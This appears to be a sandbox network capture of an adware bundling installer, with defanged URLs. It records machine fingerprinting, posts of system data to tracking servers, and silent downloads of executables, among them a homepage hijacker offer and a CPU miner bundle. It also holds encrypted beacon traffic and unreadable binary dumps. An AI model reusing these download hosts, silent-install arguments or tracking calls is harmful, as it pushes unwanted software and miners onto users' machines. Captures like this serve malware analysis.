{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:21 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d3oxtn1x3b8d7i.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/xml; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Server: nginx

Date: Fri, 25 Sep 2015 20:59:13 GMT

Expires: Fri, 25 Sep 2015 18:12:33 GMT

Cache-Control: no-cache

Vary: Accept-Encoding

X-Cache: Miss from cloudfront

Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)

X-Amz-Cf-Id: bJ7qZdd1PaK6k-GVDpBvzjf4lLWfXOeySZS98b5UrmbKqjb17Dr_aA==

37a0..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val

<<< skipped >>>

POST /binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Filename: nsb32.tmp

User-Agent: NSIS_Inetc (Mozilla)

Host: d3oxtn1x3b8d7i.cloudfront.net

Content-Length: 8804

Connection: Keep-Alive

Cache-Control: no-cache

installer_data={"uid":"8A52D41A77F94021AA693531F4B425AD","muid":"bb240ea4d92fcc6bc5ca46520f398adc","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false

HTTP/1.1 200 OK

Content-Type: text/xml; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Server: nginx

Date: Fri, 25 Sep 2015 20:59:20 GMT

Vary: Accept-Encoding

Expires: Fri, 25 Sep 2015 18:12:40 GMT

Cache-Control: no-cache

X-Cache: Miss from cloudfront

Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0v6xaVGqLR8dot9XMb3ee755wfxnNCNeuS03cJYIdr7hzVYBA2IERw==

4c0..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</deco..12b8..r><decor type="text">and</decor&gt

<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:12 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 20:58:12 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:09 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 20:59:00 GMT

Set-Cookie: _c4aid=8FB148141BB94CB98BCB1B481D21EC8E; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=8FB148141BB94CB98BCB1B481D21EC8E,1443214749.35392; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /installers/bi_downloader/1443211351854/setup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sub.spirlymo.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 430280

Connection: keep-alive

Server: nginx

Date: Fri, 25 Sep 2015 20:02:52 GMT

Last-Modified: Fri, 25 Sep 2015 20:02:33 GMT

ETag: "5605a859-690c8"

Expires: Fri, 25 Sep 2015 20:12:52 GMT

Cache-Control: max-age=600

Accept-Ranges: bytes

Age: 238

X-Cache: Hit from cloudfront

Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _sCOF5yhy6C0IThTVV2ujHmEAbjFR4hwCmxutSK5EdOHKbinHOz0ZA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s..........pD..........H................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...pD.......F...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=47138

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443214693.dop001.fr7.t,1443214693.cds002.fr7.c

l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..

<<< skipped >>>

POST /thankyou.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.downloadsoup.com

Content-Length: 469

Connection: Keep-Alive

Cache-Control: no-cache

cnt=b16588e178af30fb408c77953db6f401&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214717&ts=1443214716&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsr18.tmp /ci 11612&bti1=

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Fri, 25 Sep 2015 20:58:37 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Fri, 25 Sep 2015 20:58:37 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....

POST /cgi-bin/get_protect.cgi HTTP/1.1

x-spidermessenger-crypted: 2

x-spidermessenger-crc32: 3412015665

x-spidermessenger-length: 275

Content-Type: text/*

User-Agent: gmsd_re_005010096-gmsd_re_005010096

Host: prof.youandmeandmeandyouhihi.com

Content-Length: 406

Cache-Control: no-cache

ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsAaJIoxT54jOVrSF2+RX+r1ugkxX7buaKejfG1TigRcOM3yZsClNi6+RKQstPciC/856Qj+eW+2Ds/sNwgcHbBD7Jseu82BMjcZoqd9m22IdjGh25xHdq7YLxw2vNXIwoP8ZbkXd9QaHFABou/P9RHNZRYT0z+v2DbKvEF6irE1i5wAqDxg41wbQqiXx3dDtQ9Nj0kd6iEQ+8xgoJnJa1RwardrhSV9zTpLGFIeaIiTokC/EfCJRVGVu8VLEGU9sG9gUZsbBf19GgqWq+j5DDk8EA/rPxA7aS+lY3ONadlXpVpiTFc4lqWGWIlIU+EwXL/Vy03LgZKMI=

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:07 GMT

Server: Apache/2.2.22

x-SPIDERMESSENGER-crypted: 2

x-SPIDERMESSENGER-length: 26779

x-SPIDERMESSENGER-crc32: -1

Set-Cookie: conftime=1443214747; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1443214747022937; path=/; expires=Sun, 25-Oct-15 20:59:07 GMT

Vary: Accept-Encoding

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfiojYYz2J4lcZpqMJFnuekB68OnLZXcL3ov7CupVcdabeJuH1jlD4y/K3QDG2chz707pf3 AMEnTYm5UctPKyamFfHt8RRlaWa7rxj/wyfyN71kSi8U7AumPkLogJnxGSIConRU9DkS3LW UZKg0Bs9CDwlUQew7NyZ3z/JVCjV2ObeVgi9jUBULCRlz9Y1GH83qN hM2Gx4LBEDGACKRUE0tpNZECA3HaSoebnGFCprL3 NKFrrOmcaIKTpolHxvt7iWT5P3OcdduGsQ7PK2F/1/ImMSkwRLJKv2wjvk H2aMoECBsUjP lXf1v/bdhQz1gcrIjliSL5D6Y1zEnTfDFER/ H1/waN2NxexqwzNAGQhxkEuW2YXEyZfP9ScMREJHieN/jkhPvM0pCRZWHVmwwDz0cDbEaFeIcjL3iiVDyOo4lMGYSJRvYnzMm2Jg82YT/5jAbi4dqydpEqqE ON39OZuQ2BCtPof46kKnFTTeUxnt/Q1w95TqebKSUFbUUHYAd1E30FFsYXmRRhdYNzTbQtUMqVCS xppXLwNI5qh2qG9kfuM5 1LGoHxI2p1nRfxCZURmarLRHGAnhsa7toV7UeC5sjq2Ns8CFHrql5B 8WlEdgy01fnRdOm8bjre7KzMMuCSOYBfBKVDhcDdvtq3uXsQcqtZuD/Gh7s7khiEwyjILzMwmL4 RCBjK CIhSRu 8CrqrZPYSQPEMx5YNtUtPu/kKVvTaAI1DsstgJQETBh0l27OrCckPydlv6Dk0vwBz/m8vjAcS wY6KG2XOayizDu8jJvL781dkaRevCStVtdZWLM yCqSKdqI7u2N/6sla1laRA9mzEk16JdzTqpqdqnV6haAN6LsGxjw8yU0Bg/xayUYK8V4GAg2BgMvSnphDcXSU8LI8yeHJ6evOse4ZWotYdSDoPrh/PXgtgkz9SgRmz3oHxXhNrHFFXnHCiVSIjp4aLJpsZGO22jBpMaSuogal5or3BB9rZF GKCQCMpPCapG2J04hDZhSUt4JsT hWVU XpNsGk61PcTxG82C4h7epEM3Cy2gnokdDsAH51 afaI5MPF mgeat6FnB kLdk93oGywxSV8z8D6ZaRwSXLYzREE8Nqs31ULnCsEhbruL2RVKg0QF9aG0/xuxVk cYhGoWzE9ZNghRlbZMNsUIEnTx1KMwpLzRr2yUDXdWBeIV2UF CV7IQ3MSNqPeUoGELftHUHejIiU/D 52t3dtPqrCHerFRSTWFH5lb9YFPK5YUoPbI6j51Hrsa0uTel4/IkO9oO8oVtxDIq3okQqOHtQYVE2z5poWmiHI6YM6r5eGzfH/Phblc3As7ZAysFqQU0o2pTLYY060ygLAQowhEa 1oihMtOLFHd4OteAec/KVvogYh

<<< skipped >>>

GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:43 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441897175"

Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT

Cache-Control: max-age=34467

Content-Length: 104395

Content-Type: application/octet-stream

X-HW: 1443214724.dop012.fr7.t,1443214723.cds004.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1

User-Agent: gmsd_re_005010096-1.20

Host: ads.under-myscreen.be

Accept: */*

Accept-Encoding: gzip, deflate

Referer:

Cookie:

Accept-Language: en,en-US

X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03

X-OS-Ver: 5.1.2.2600

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:07 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

X-C4PC-ServerName: ads.under-myscreen.be

Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;

Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443214747.35666; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"}]}},"freeze":3600,"refresh":3600,"version":116555}..0..

GET /69/all/cp/row/setup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.staticclientstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:08 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441951687"

Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT

Cache-Control: max-age=2615

Content-Length: 1998408

Content-Type: application/x-msdownload

X-HW: 1443214689.dop006.fr7.t,1443214688.cds030.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:09 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 20:59:00 GMT

Set-Cookie: _c4aid=9A6B9A8C52E147EA857C4E446034B0B1; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=9A6B9A8C52E147EA857C4E446034B0B1,1443214749.68757; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

POST /thankyou.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.downloadsoup.com

Content-Length: 460

Connection: Keep-Alive

Cache-Control: no-cache

cnt=5abcf66d3f0dc523a5803c4e5557f120&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214726&ts=1443214726&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsr21.tmp /ci 12216&bti1=

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Fri, 25 Sep 2015 20:58:46 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ....

GET /cmmdWriter.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d2fpsq9kg43yka.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 46305

Connection: keep-alive

Date: Fri, 25 Sep 2015 20:05:40 GMT

Last-Modified: Fri, 25 Sep 2015 20:00:37 GMT

ETag: "d4937ebdbcea35fc0f12233e57c30ca4"

Accept-Ranges: bytes

Server: AmazonS3

Age: 3129

X-Cache: Hit from cloudfront

Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: y9BfFCZYn6rBqOYbS3Kp0ogsFzshOdWQ08vtiTBdcapaDD_Rzvsjlw==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 124

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4605\",\"channel_id\": \"\", \"utm_addition\":\"vpol=som&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:24 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:24 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d1mdi78qyff344.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 91074

Connection: keep-alive

Date: Thu, 24 Sep 2015 23:30:47 GMT

Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT

ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"

Accept-Ranges: bytes

Server: AmazonS3

Age: 77267

X-Cache: Hit from cloudfront

Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0--xCiVe4KF4xhuzhsyv4CdyEdfpC8lEZXuiObvfot_2jeG3U8Xq7A==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................)..............................................t........)..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata....&..............................rsrc.........)......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... 